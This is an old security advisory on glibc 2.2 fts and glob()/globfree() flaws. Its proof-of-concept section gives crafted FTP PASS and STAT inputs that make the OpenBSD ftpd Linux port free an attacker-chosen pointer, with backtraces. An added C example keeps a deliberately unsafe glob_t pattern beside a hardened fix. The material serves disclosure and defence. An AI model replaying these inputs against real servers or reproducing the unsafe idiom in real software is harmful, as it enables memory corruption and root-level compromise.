21st Dec 2001 [SBWID-4951]
COMMAND
fts race condition and glob buffer overflow
SYSTEMS AFFECTED
glibc-2.2
PROBLEM
From Tom Parker's Global InterSec (http://www.globalintersec.com) advisory 2001121001:
Two bugs were found in glibc, leading to a buffer overflow and a race
condition.
The race condition is in the fts routines that traverse directory
structures; it allowed malicious users to cause other processes to
'break out of' the file hierarchy. The fts problem was discovered by
Nick Cleaton.
The buffer overflow is in the glob() and globfree() functions, as
described in Global InterSec Advisory 2001121001.
The glibc glob() function allows programs to search for path names
matching specific patterns according to the rules used by the shell. Glibc
also implements the globfree() function, which free()'s the memory that
an earlier glob() call allocated for its matches.
The glob function itself may encounter errors when handling strings
ending with the "{" (0x7b) character. This is due to next_brace_sub(),
which can cause glob to read memory pages it should not, eventually
causing the program to exit (normally with SIGSEGV).
Note: The vulnerability described in CA-2001-33 in Washington
University's ftpd was not due to errors in glibc glob, but to that
daemon's own implementation of the function.
Previous discussions on bugtraq and other mailing lists ruled this bug
as not exploitable. This is not entirely true: Global InterSec has since
discovered a condition under which the bug can be exploited.
This depends on the program in question using the globfree()
function, also defined in glibc glob.c (sysdeps/generic/glob.c). An
example of such a program is the OpenBSD ftpd Linux port.
By carefully crafting user input to such daemons it is possible to
corrupt the memory space of the process. Ultimately this can give the
attacker the ability to execute arbitrary commands with the privileges
of the server process, which is often root (uid 0).
Scope for attack:
For this bug to be exploitable the attacker must be able to cause a
daemon to call the glob matching functions, via services which allow
anonymous/public access or which require authentication. This
includes ftp daemons.
Exploits (Proof of concept):
For the purposes of proving the concept we now refer to the use of these
functions in the OpenBSD ftp daemon, ported to Linux by David Madore.
As recently seen in the Washington University ftp daemon,
free()-based vulnerabilities are readily exploitable. In the case of
the OpenBSD ftpd we must ensure that globfree() is called to make any
use of the glob vulnerability.
Note: OpenBSD itself is not vulnerable to this form of attack due to
the way in which it handles memory pages.
By forcing globfree() to be called _before_ the next_brace_sub
condition occurs it is possible to control the address which is
free()'d. In our first example we insert an invalid address onto the
stack, causing the program to SEGV.
: 220 localhost FTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
-> USER ftp
: 331 Guest login ok, type your name as password.
Sleeping for 10 seconds...
-> PASS AAAAAAAAAAAAAAAAAAA\xef\xef\xbe\xad\xde   # (<19 bytes> <addr to write> <glob char>)
: 230 Guest login ok, access restrictions apply.
-> STAT ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{
#0 0x400f7968 in globfree () at ../sysdeps/generic/glob.c:1055
#1 0x8051b0b in yyparse () at ftpcmd.y:1138
#2 0x804b455 in main (argc=1094795585, argv=0xbffff864,
envp=0xbffff86c) at ftpd.c:715
Examination of the registers shows that we have successfully inserted
the intended address (argc has also been overwritten with 0x41414141,
the 'A' padding). As the address is not valid, the ftp daemon seg
faults.
<snip>
esi 0xdeadbeef -559038737
edi 0xdeadbeef -559038737
</snip>
On giving the ftp daemon a valid address to free (in this case a
pointer to syslog()) the daemon proceeds to free() the address we
gave it, where it again segfaults because the address is not a valid
malloc chunk.
#0 0x400c6178 in free () at malloc.c:2952
#1 0x400f7989 in globfree () at ../sysdeps/generic/glob.c:1055
#2 0x8051b0b in yyparse () at ftpcmd.y:1138
#3 0x804b455 in main (argc=1094795585, argv=0xbffff864,
envp=0xbffff86c) at ftpd.c:715
i.e., the free() calls in globfree() (SuSE glibc-2.2/sysdeps/generic/glob.c):
glob.c:1097 if (pglob->gl_pathv[pglob->gl_offs + i] != NULL)
glob.c:1098 free ((__ptr_t) pglob->gl_pathv[pglob->gl_offs + i]);
glob.c:1099 free ((__ptr_t) pglob->gl_pathv);
Information on exploiting this form of vulnerability is available at
http://www.phrack.org/show.php?p=57&a=9
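The backtraces above show globfree() handing whatever gl_pathv held to free(); the PASS step plants the value on the stack, the STAT step with the trailing "{" makes glob() bail out and globfree() then frees it. The following is an added example, not code from the Global InterSec advisory, from glibc, or from the OpenBSD ftpd Linux port. It shows the caller-side idiom that makes such a controlled free() possible (an uninitialised stack glob_t freed after a failed glob(), which is this example's reading of the advisory's stack-planting step, not something the advisory states in those words) next to a hardened form. The function names, the brace-balance pre-check and the use of GLOB_BRACE are this example's own choices and are not the vendor fix; the real fix remains the updated glibc packages named under SOLUTION.

```c
/* glob_guard.c: the glob()/globfree() calling pattern that can turn a failed
 * glob() into a free() of a caller-controlled pointer, next to a hardened
 * form.  Added example; not code from the advisory, glibc or the ftpd port. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* GLOB_BRACE is a GNU/BSD extension */
#endif
#include <glob.h>
#include <stdio.h>
#include <string.h>

/* BEFORE (hazard): the glob_t lives on the stack and is never initialised,
 * and globfree() runs whether or not glob() succeeded.  On a glob()
 * implementation that returns before it assigns gl_pathv (the assumption
 * this example makes about the glibc 2.2 behaviour described above), the
 * free() inside globfree() operates on whatever an earlier command left in
 * that stack slot.  Kept for illustration only; nothing here calls it. */
size_t list_matches_unsafe(const char *pattern)
{
    glob_t g;                               /* gl_pathv is stack garbage */
    int rc = glob(pattern, GLOB_BRACE, NULL, &g);
    size_t n = (rc == 0) ? g.gl_pathc : 0;
    globfree(&g);                           /* frees g.gl_pathv even if rc != 0 */
    return n;
}

/* Reject a pattern whose brace groups are not balanced before it reaches
 * glob().  Returns 1 if balanced, 0 otherwise; a backslash escapes the next
 * character, as in shell patterns.  This pre-check is this example's own
 * mitigation, not part of glibc. */
int brace_balanced(const char *pattern)
{
    int depth = 0;
    for (const char *p = pattern; *p; p++) {
        if (*p == '\\' && p[1]) { p++; continue; }   /* skip escaped char */
        if (*p == '{') {
            depth++;
        } else if (*p == '}') {
            if (depth == 0) return 0;                 /* stray closing brace */
            depth--;
        }
    }
    return depth == 0;                                /* unclosed '{' -> 0 */
}

/* AFTER (hardened): zero the glob_t so gl_pathv is NULL on every early-return
 * path, refuse malformed brace patterns up front, and only trust gl_pathc
 * when glob() reported success.  globfree() on a zeroed glob_t is a no-op,
 * so free() can never see a pointer the caller did not allocate.
 * Returns the match count, 0 for no match, -1 for a rejected or failed pattern. */
long list_matches_safe(const char *pattern)
{
    if (!brace_balanced(pattern))
        return -1;                          /* never let "...{" reach glob() */
    glob_t g;
    memset(&g, 0, sizeof g);                /* gl_pathv == NULL, gl_pathc == 0 */
    int rc = glob(pattern, GLOB_BRACE, NULL, &g);
    long n;
    if (rc == 0)
        n = (long)g.gl_pathc;
    else if (rc == GLOB_NOMATCH)
        n = 0;
    else
        n = -1;                             /* GLOB_ABORTED / GLOB_NOSPACE */
    globfree(&g);                           /* safe: NULL gl_pathv is skipped */
    return n;
}

int main(void)
{
    /* Constructed probes: a directory that exists everywhere, one that does
     * not, and a STAT-style argument with a dangling brace. */
    const char *probes[] = { "/*", "/nonexistent-dir-x9z/*", "~AAAAAAAAAAAAAAAA{" };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-28s -> %ld\n", probes[i], list_matches_safe(probes[i]));
    return 0;
}
```

Build with `cc -Wall glob_guard.c -o glob_guard` and run it; the dangling-brace probe is rejected with -1 without glob() ever seeing it. The pre-check only narrows the attack surface for the pattern shape the advisory names; the memset and the success-gated use of gl_pathc are what stop globfree() from freeing a planted pointer, and an unpatched glibc still needs the distribution update.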
SOLUTION
Install new packages from your distribution.
Legal:
This advisory is the intellectual property of Global InterSec LLC
but may be freely distributed with the conditions that:
a) no fee is charged and b) appropriate credit is given.
(c) Global InterSec LLC 2001